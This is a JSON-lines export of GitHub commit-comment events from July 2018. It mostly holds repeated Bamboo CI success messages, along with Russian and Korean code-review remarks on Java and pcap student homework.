{"id":"8034435141","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876142,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-29T18:37:21Z","updated_at":"2018-07-29T18:37:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:37:21Z"}
{"id":"8034435504","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876147,"position":5,"line":5,"path":"src/lesson7/Shape.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:37:38Z","updated_at":"2018-07-29T18:37:38Z","author_association":"NONE","body":"отступ между методами"}},"created_at":"2018-07-29T18:37:38Z"}
{"id":"8034435505","type":"CommitCommentEvent","actor":{"login":"Hains"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":29876146,"position":null,"line":null,"path":null,"commit_id":"e67ade7c83d31475c365a7c6c35fb7b365a51850","created_at":"2018-07-29T18:37:38Z","updated_at":"2018-07-29T18:37:38Z","author_association":"CONTRIBUTOR","body":"When 'CanAC3plusTranscode' is added as option in yellow menu and\r\nservice has subtitle:\r\n\r\nWhen selecting 'subtitle slection' (blue button) you get 'Audio sync' menu.\r\nAudio Sync appears in menu but nothing happens when selecting.\r\nSubtitle menu is unreachable.\r\n\r\nWhen service has no subtitle:\r\n\r\nChannel item has no button.\r\nBlue botton is assigned to nothing.\r\nAudio Sync appears in menu but nothing happens when selecting.\r\n\r\nBTW:\r\nYellow button menu has space for 4 items, so with 5 items\r\nyou get a scrollbar.\r\nSo it needs skin changes as well. "}},"created_at":"2018-07-29T18:37:38Z"}
{"id":"8034435759","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876148,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-29T18:37:51Z","updated_at":"2018-07-29T18:37:51Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-29T18:37:51Z"}
{"id":"8034435816","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876149,"position":8,"line":8,"path":"src/lesson7/Shape.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:37:53Z","updated_at":"2018-07-29T18:37:53Z","author_association":"NONE","body":"код не форматируешь"}},"created_at":"2018-07-29T18:37:53Z"}
{"id":"8034435942","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876150,"position":5,"line":5,"path":"src/lesson7/ShapeUtils.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:38:01Z","updated_at":"2018-07-29T18:38:01Z","author_association":"NONE","body":"утилитный класс final и private конструктор"}},"created_at":"2018-07-29T18:38:01Z"}
{"id":"8034436247","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876151,"position":15,"line":15,"path":"src/lesson7/ShapeUtils.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:38:13Z","updated_at":"2018-07-29T18:38:13Z","author_association":"NONE","body":"не надо лишних отступов в конце класса"}},"created_at":"2018-07-29T18:38:13Z"}
{"id":"8034436338","type":"CommitCommentEvent","actor":{"login":"HollandAsh"},"repo":{"name":"githubschool/open-enrollment-classes-introduction-to-github"},"payload":{"comment":{"id":29876152,"position":null,"line":null,"path":null,"commit_id":"c018276bd088e4e32ade1960c71d345f069b6fae","created_at":"2018-07-29T18:38:17Z","updated_at":"2018-07-29T18:38:17Z","author_association":"COLLABORATOR","body":"Hi, how do the changes look?"}},"created_at":"2018-07-29T18:38:17Z"}
{"id":"8034436724","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876155,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-29T18:38:32Z","updated_at":"2018-07-29T18:38:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:38:32Z"}
{"id":"8034436839","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876159,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-29T18:38:36Z","updated_at":"2018-07-29T18:38:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:38:36Z"}
{"id":"8034436889","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876160,"position":3,"line":3,"path":"src/lesson9/Homework1.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:38:38Z","updated_at":"2018-07-29T18:38:38Z","author_association":"NONE","body":"не использовать множественный импорт, не по код конвеншену. Исправить в настроках идеи, я показывал как"}},"created_at":"2018-07-29T18:38:38Z"}
{"id":"8034437101","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876161,"position":7,"line":7,"path":"src/lesson9/Homework1.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:38:47Z","updated_at":"2018-07-29T18:38:47Z","author_association":"NONE","body":"Программируем на уровне интерфейсов, а не реализации - поэтому List"}},"created_at":"2018-07-29T18:38:47Z"}
{"id":"8034437306","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876162,"position":19,"line":19,"path":"src/lesson9/Homework1.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:38:56Z","updated_at":"2018-07-29T18:38:56Z","author_association":"NONE","body":"\r\nникакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T18:38:56Z"}
{"id":"8034437487","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876163,"position":24,"line":24,"path":"src/lesson9/Homework1.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:39:04Z","updated_at":"2018-07-29T18:39:04Z","author_association":"NONE","body":"\r\nв методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T18:39:04Z"}
{"id":"8034437789","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876164,"position":38,"line":38,"path":"src/lesson9/Homework2.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:39:17Z","updated_at":"2018-07-29T18:39:17Z","author_association":"NONE","body":"то же самое, в утилитные классы выносим"}},"created_at":"2018-07-29T18:39:17Z"}
{"id":"8034437988","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876165,"position":50,"line":50,"path":"src/lesson9/Homework2.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:39:27Z","updated_at":"2018-07-29T18:39:27Z","author_association":"NONE","body":"не надо лишних отступов после класса"}},"created_at":"2018-07-29T18:39:27Z"}
{"id":"8034438305","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876166,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-29T18:39:43Z","updated_at":"2018-07-29T18:39:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:39:43Z"}
{"id":"8034438520","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876167,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-29T18:39:50Z","updated_at":"2018-07-29T18:39:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:39:50Z"}
{"id":"8034438690","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29876168,"position":23,"line":23,"path":"src/lesson9/Homework2.java","commit_id":"a73e38048ae8da869ee17002f80af3ff30501c24","created_at":"2018-07-29T18:39:59Z","updated_at":"2018-07-29T18:39:59Z","author_association":"NONE","body":"а где собственные компараторы? не использовал совсем"}},"created_at":"2018-07-29T18:39:59Z"}
{"id":"8034438735","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29876169,"position":10,"line":10,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T18:40:01Z","updated_at":"2018-07-29T18:40:01Z","author_association":"MEMBER","body":"It could easily check if a bare name in that field corresponded to a list of devs on the web."}},"created_at":"2018-07-29T18:40:01Z"}
{"id":"8034439320","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"hyejin106/pcap_test"},"payload":{"comment":{"id":29876170,"position":49,"line":49,"path":"main.cpp","commit_id":"168cdd63ab964827e05fe4cd7efc348a368ef894","created_at":"2018-07-29T18:40:28Z","updated_at":"2018-07-29T18:40:28Z","author_association":"NONE","body":"IP Header 위치를 위한 packet 변수값 변경은 ether_type 확인 이후 하는 것이 좋음. 아래 56라인도 동일."}},"created_at":"2018-07-29T18:40:28Z"}
{"id":"8034439732","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876174,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-29T18:40:46Z","updated_at":"2018-07-29T18:40:46Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-29T18:40:46Z"}
{"id":"8034439862","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876175,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-29T18:40:53Z","updated_at":"2018-07-29T18:40:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:40:53Z"}
{"id":"8034440174","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876176,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-29T18:41:07Z","updated_at":"2018-07-29T18:41:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:41:07Z"}
{"id":"8034440873","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29876178,"position":6,"line":6,"path":"src/homeTasks/lesson7/ShapeUtils.java","commit_id":"c5a3c8c2abc10251398cf31dbdf2dcbc1bcdae98","created_at":"2018-07-29T18:41:38Z","updated_at":"2018-07-29T18:41:38Z","author_association":"NONE","body":"утилитный класс final и private конструктор"}},"created_at":"2018-07-29T18:41:38Z"}
{"id":"8034441375","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876180,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-29T18:42:02Z","updated_at":"2018-07-29T18:42:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:42:02Z"}
{"id":"8034441818","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876182,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-29T18:42:20Z","updated_at":"2018-07-29T18:42:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:42:20Z"}
{"id":"8034442009","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"hyejin106/pcap_test"},"payload":{"comment":{"id":29876184,"position":63,"line":63,"path":"main.cpp","commit_id":"168cdd63ab964827e05fe4cd7efc348a368ef894","created_at":"2018-07-29T18:42:28Z","updated_at":"2018-07-29T18:42:28Z","author_association":"NONE","body":"TCP Data의 길이는 header->caplen에서 나머지 헤더의 크기를 빼는 것이 아니라\r\n\"IP헤더의 전체 크기 - IP헤더의 크기 - TCP헤더의 크기\"로 계산해야 함."}},"created_at":"2018-07-29T18:42:28Z"}
{"id":"8034442189","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Pgsnikable/Jd1"},"payload":{"comment":{"id":29876185,"position":51,"line":51,"path":"src/homeTasks/lesson7/closedFigures/Rectangle.java","commit_id":"c5a3c8c2abc10251398cf31dbdf2dcbc1bcdae98","created_at":"2018-07-29T18:42:35Z","updated_at":"2018-07-29T18:42:35Z","author_association":"NONE","body":"нет конечно, ты предоставил для квадрата интерфейс, который ему совсем не подходит. Я могу спокойно сделать твой квадр прямоугольником, хотя класс все равно квадрат, в корне не верно"}},"created_at":"2018-07-29T18:42:35Z"}
{"id":"8034442428","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"hyejin106/pcap_test"},"payload":{"comment":{"id":29876190,"position":67,"line":67,"path":"main.cpp","commit_id":"168cdd63ab964827e05fe4cd7efc348a368ef894","created_at":"2018-07-29T18:42:46Z","updated_at":"2018-07-29T18:42:46Z","author_association":"NONE","body":"15 > 16"}},"created_at":"2018-07-29T18:42:46Z"}
{"id":"8034442839","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"hyejin106/pcap_test"},"payload":{"comment":{"id":29876191,"position":70,"line":70,"path":"main.cpp","commit_id":"168cdd63ab964827e05fe4cd7efc348a368ef894","created_at":"2018-07-29T18:43:08Z","updated_at":"2018-07-29T18:43:08Z","author_association":"NONE","body":"\"%x \"> \"%02x \""}},"created_at":"2018-07-29T18:43:08Z"}
{"id":"8034442957","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876192,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-29T18:43:13Z","updated_at":"2018-07-29T18:43:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:43:13Z"}
{"id":"8034442986","type":"CommitCommentEvent","actor":{"login":"vlaktion"},"repo":{"name":"vlaktion/city"},"payload":{"comment":{"id":29876193,"position":null,"line":null,"path":null,"commit_id":"4a5e97365c353aa3372d358e3ff959b209387767","created_at":"2018-07-29T18:43:15Z","updated_at":"2018-07-29T18:43:15Z","author_association":"OWNER","body":"add readMe"}},"created_at":"2018-07-29T18:43:15Z"}
{"id":"8034443400","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876194,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-29T18:43:34Z","updated_at":"2018-07-29T18:43:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:43:34Z"}
{"id":"8034443834","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876198,"position":6,"line":6,"path":"firstmodul/homework1function/Task1.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:43:53Z","updated_at":"2018-07-29T18:43:53Z","author_association":"NONE","body":"отступ между классом и методом, а так же между классом и его полями"}},"created_at":"2018-07-29T18:43:53Z"}
{"id":"8034443964","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876200,"position":7,"line":7,"path":"firstmodul/homework1function/Task1.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:44:00Z","updated_at":"2018-07-29T18:44:00Z","author_association":"NONE","body":"не надо отступов в первой строчке метода"}},"created_at":"2018-07-29T18:44:00Z"}
{"id":"8034444539","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"AlexZhuk88/BazekinNikita"},"payload":{"comment":{"id":29876202,"position":15,"line":15,"path":"firstmodul/homework1function/Task1.java","commit_id":"a29d06c0003336260a613f7fae60c5714417a9b2","created_at":"2018-07-29T18:44:25Z","updated_at":"2018-07-29T18:44:25Z","author_association":"NONE","body":"никаких сравнений не true-false? сразу isVisokocni(year) ? ..."}},"created_at":"2018-07-29T18:44:25Z"}
{"id":"8034444829","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876206,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-29T18:44:39Z","updated_at":"2018-07-29T18:44:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:44:39Z"}
{"id":"8034445014","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29876207,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-29T18:44:48Z","updated_at":"2018-07-29T18:44:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-29T18:44:48Z"}
